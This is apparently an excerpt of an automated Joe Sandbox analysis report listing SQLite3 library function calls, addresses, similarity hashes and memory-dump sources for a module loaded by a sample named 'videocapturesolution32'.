                                                          • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                          • String ID: optimize
                                                          • API String ID: 1540667495-3797040228
                                                          • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                          • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                          • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                          • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                          APIs
                                                          • sqlite3_finalize.SQLITE3 ref: 60966178
                                                          • sqlite3_free.SQLITE3 ref: 60966183
                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                          • sqlite3_value_text.SQLITE3 ref: 60966236
                                                          • sqlite3_value_int.SQLITE3 ref: 60966274
                                                          • memcmp.MSVCRT ref: 6096639E
                                                            • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                            • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                          • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                          • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                          • String ID: ASC$DESC$x
                                                          • API String ID: 4082667235-1162196452
                                                          • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                          • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                          • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                          • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096882B
                                                          • sqlite3_bind_int.SQLITE3 ref: 60968842
                                                          • sqlite3_step.SQLITE3 ref: 6096884D
                                                          • sqlite3_reset.SQLITE3 ref: 60968858
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968907
                                                          • sqlite3_bind_int.SQLITE3 ref: 60968924
                                                          • sqlite3_step.SQLITE3 ref: 6096892F
                                                          • sqlite3_column_blob.SQLITE3 ref: 60968947
                                                          • sqlite3_column_bytes.SQLITE3 ref: 6096895C
                                                          • sqlite3_column_int64.SQLITE3 ref: 60968975
                                                          • sqlite3_reset.SQLITE3 ref: 609689B0
                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                          • sqlite3_free.SQLITE3 ref: 60968A68
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B00
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B2D
                                                          • sqlite3_step.SQLITE3 ref: 60968B38
                                                          • sqlite3_reset.SQLITE3 ref: 60968B43
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B9F
                                                          • sqlite3_bind_blob.SQLITE3 ref: 60968BC8
                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968BEF
                                                          • sqlite3_bind_int.SQLITE3 ref: 60968C0C
                                                          • sqlite3_step.SQLITE3 ref: 60968C17
                                                          • sqlite3_reset.SQLITE3 ref: 60968C22
                                                          • sqlite3_free.SQLITE3 ref: 60968C2F
                                                          • sqlite3_free.SQLITE3 ref: 60968C3A
                                                            • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
                                                            • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
                                                            • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
                                                            • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
                                                            • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
                                                            • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
                                                          • String ID:
                                                          • API String ID: 2526640242-0
                                                          • Opcode ID: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                          • Instruction ID: ecb2fadc30329ad4410b738d56806f6ecd0ac298638076f7c65242d8805d2ed1
                                                          • Opcode Fuzzy Hash: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                          • Instruction Fuzzy Hash: A0D1C2B4A153189FDB14DF68C884B8EBBF2BFA9304F118599E888A7344E774D985CF41
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                          • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                          • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                            • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                            • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                            • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                            • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                          • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                          • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                          • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                          • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                          • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                          • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                          • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                          • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                            • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                          • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                          • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                          • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                          • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                          • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                          • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                          • String ID:
                                                          • API String ID: 961572588-0
                                                          • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                          • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                          • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                          • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                          • String ID: 2$foreign key$indexed
                                                          • API String ID: 4126863092-702264400
                                                          • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                          • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                          • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                          • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                          • sqlite3_step.SQLITE3 ref: 6094A73C
                                                          • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                          • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                          • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                          • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                          • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 2794791986-0
                                                          • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                          • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                          • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                          • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                          Similarity
                                                          • API ID: sqlite3_stricmp
                                                          • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                          • API String ID: 912767213-1308749736
                                                          • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                          • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                          • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                          • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                          • sqlite3_step.SQLITE3 ref: 6094B496
                                                          • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                          • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                          • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                            • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                          • String ID:
                                                          • API String ID: 4082478743-0
                                                          • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                          • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                          • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                          • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                          • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                          Similarity
                                                          • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: BINARY$INTEGER
                                                          • API String ID: 317512412-1676293250
                                                          • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                          • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                          • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                          • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                          • sqlite3_step.SQLITE3 ref: 6094B590
                                                          • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                          • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                          • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                          Similarity
                                                          • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 2802900177-0
                                                          • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                          • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                          • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                          • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                            • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                            • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                          Similarity
                                                          • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                          • String ID:
                                                          • API String ID: 4038589952-0
                                                          • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                          • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                          • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                          • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                          APIs
                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                          • sqlite3_step.SQLITE3 ref: 6094C72A
                                                          • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                            • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                            • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
                                                          • sqlite3_free.SQLITE3 ref: 6094C881
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                          • String ID:
                                                          • API String ID: 3487101843-0
                                                          • Opcode ID: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                          • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                          • Opcode Fuzzy Hash: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                          • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                          APIs
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                          • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                          • sqlite3_step.SQLITE3 ref: 6096A435
                                                          • sqlite3_reset.SQLITE3 ref: 6096A445
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 247099642-0
                                                          • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                          • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                          • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                          • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                          APIs
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_step.SQLITE3 ref: 6096A32D
                                                          • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                          • sqlite3_reset.SQLITE3 ref: 6096A354
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                          • String ID:
                                                          • API String ID: 326482775-0
                                                          • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                          • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                          • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                          • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                          APIs
                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6095F83D
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6095F85E
                                                          • sqlite3_step.SQLITE3 ref: 6095F869
                                                          • sqlite3_reset.SQLITE3 ref: 6095F874
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave$sqlite3_freesqlite3_mprintfsqlite3_mutex_entersqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 2747803115-0
                                                          • Opcode ID: e7ba5a424be07f97404f27e37360827cc19527dc01f9216413d7b5c44ff8a2c2
                                                          • Instruction ID: f00e87c6dd3c8672f4b8fa92d33f96d93ee8ab4b9f2e93312e2458fba8eee522
                                                          • Opcode Fuzzy Hash: e7ba5a424be07f97404f27e37360827cc19527dc01f9216413d7b5c44ff8a2c2
                                                          • Instruction Fuzzy Hash: 9311DBB4A046049FCB04DF69C0C565AF7F6EFA8318F05C869E8898B349E735E894CB91
                                                          APIs
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                          • sqlite3_step.SQLITE3 ref: 6094B74A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                          • String ID:
                                                          • API String ID: 3305529457-0
                                                          • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                          • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                          • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                          • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1477753154-0
                                                          • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                          • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                          • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                          • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
